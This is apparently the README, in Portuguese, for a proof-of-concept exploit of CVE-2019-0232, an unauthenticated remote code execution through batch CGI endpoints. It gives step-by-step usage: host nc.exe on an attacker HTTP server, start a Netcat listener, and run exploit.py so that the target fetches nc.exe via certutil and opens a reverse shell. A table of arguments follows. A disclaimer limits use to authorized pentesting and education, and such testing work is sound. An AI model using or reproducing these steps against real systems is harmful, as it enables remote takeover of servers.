
Exploit based in /jaiguptanick/CVE-2019-0232
PoC para RCE não autenticado via endpoints batch CGI. Baixa o nc.exe para o alvo usando certutil e aciona uma reverse shell.
1. Sirva o nc.exe (no mesmo diretório onde o nc.exe está):
python3 -m http.server 80
2. Inicie seu listener:
nc -lvnp 1234
3. Execute o exploit:
python3 exploit.py \
--url http://:/cgi/.bat \
--server-ip \
--server-port 80 \
--nc-ip \
--nc-port 1234
Apenas para testes de penetração autorizados e fins educacionais.
| Argumento | Obrigatório | Padrão | Descrição |
|---|
--url | ✅ | — | URL completa do alvo com endpoint CGI |
--server-ip | ✅ | — | Seu IP servindo nc.exe via HTTP |
--server-port | ❌ | 80 | Porta para o servidor HTTP |
--nc-ip | ✅ | — | IP do seu listener Netcat |
--nc-port | ✅ | — | Porta do seu listener Netcat |